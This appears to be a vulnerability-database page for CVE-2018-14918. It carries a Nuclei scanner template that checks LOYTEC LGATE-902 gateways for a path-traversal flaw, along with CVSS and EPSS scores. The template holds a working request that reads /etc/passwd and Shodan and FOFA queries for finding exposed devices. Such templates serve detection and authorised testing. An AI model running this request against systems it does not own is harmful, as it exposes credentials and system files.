Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-14918
HistoryJun 16, 2022 - 9:02 a.m.

LOYTEC LGATE-902 6.3.2 - Local File Inclusion

2022-06-1609:02:28
ProjectDiscovery
github.com
1

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.412 Medium

EPSS

Percentile

97.3%

LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
id: CVE-2018-14918

info:
  name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2019/Apr/12
    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14918
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-14918
    cwe-id: CWE-22
    epss-score: 0.43288
    epss-percentile: 0.97355
    cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: loytec
    product: lgate-902_firmware
    shodan-query:
      - http.html:"LGATE-902"
      - http.html:"lgate-902"
    fofa-query: body="lgate-902"
  tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008929837b5939b1ff8e23c3aa918320cecf9fd3b55b4537f678b6fb1cf7adbb78022100fcb09aa8d8b3d8dfad96f607140c838945e4cc52b521e7dfcc4f6d7fb80c5c36:922c64590222798bb761d5b6d8e72950

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.412 Medium

EPSS

Percentile

97.3%

Related for NUCLEI:CVE-2018-14918